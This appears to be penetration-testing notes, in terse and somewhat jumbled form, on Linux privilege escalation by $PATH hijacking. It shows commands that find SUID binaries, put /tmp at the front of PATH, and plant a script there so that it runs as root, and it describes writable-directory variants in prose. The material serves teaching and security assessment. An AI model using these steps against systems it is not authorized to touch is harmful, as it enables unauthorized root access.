$PATH
$PATH environment variable
$ echo $ PATH
...Possible exploitable scenarios
A script with SUID bit (
/usr/bin/bin-with-suid) is found to execute a particular named script that is not defined
Assume the named script that is executed is test-bin
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/bin-with-suid
$ /usr/bin/bin-with-suid
# error message indicating that test-bin is executed, but not found
sh: 1: test-bin: not found a)$PATH environment variable can be edited ONLY
b) Write permissions for a default value found in the $PATHenvironment variable ONLY
Scenario a)
$ echo $PATH
/usr/local/sbin:/usr/local/bin ...
$ export PATH=/tmp:$PATH
$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin ...
$ cd /tmp
$ nano test-bin
#!/...
...
$ /usr/bin/bin-with-suid
... executes /tmp/test-bin with ROOT privileges
Scenario b)
A script with SUID bit (
/usr/bin/bin-with-suid) is found to execute a named script that is defined
Assume the named script that is executed is test-bin (present in /usr/local/bin/)
a)$PATH environment variable can be edited ONLY
b) Write permissions for a path value in the$PATHenvironment variable ONLY
Scenario a)
Prepend a writable directory such as /tmp to the $PATH environment variable, and create a script with the name of that executed from the original script, in the same directory. This allows the created script to be executed with root privileges.
Scenario b)
There are 2 further possible scenarios
The path value we have write permissions for appears before the path where the named script is found. This allows us to trick the
SUIDbit script to execute the script defined by us instead. This is because the system searches for script using the path variable listed from left to right in the$PATHenvironment variable
Assume that we have write permissions for the folder/usr/local/sbin, and this path appears to the left of the value /usr/local/bin(path for the original script) in$PATH
We have write permissions for the actual path of the named script
Last updated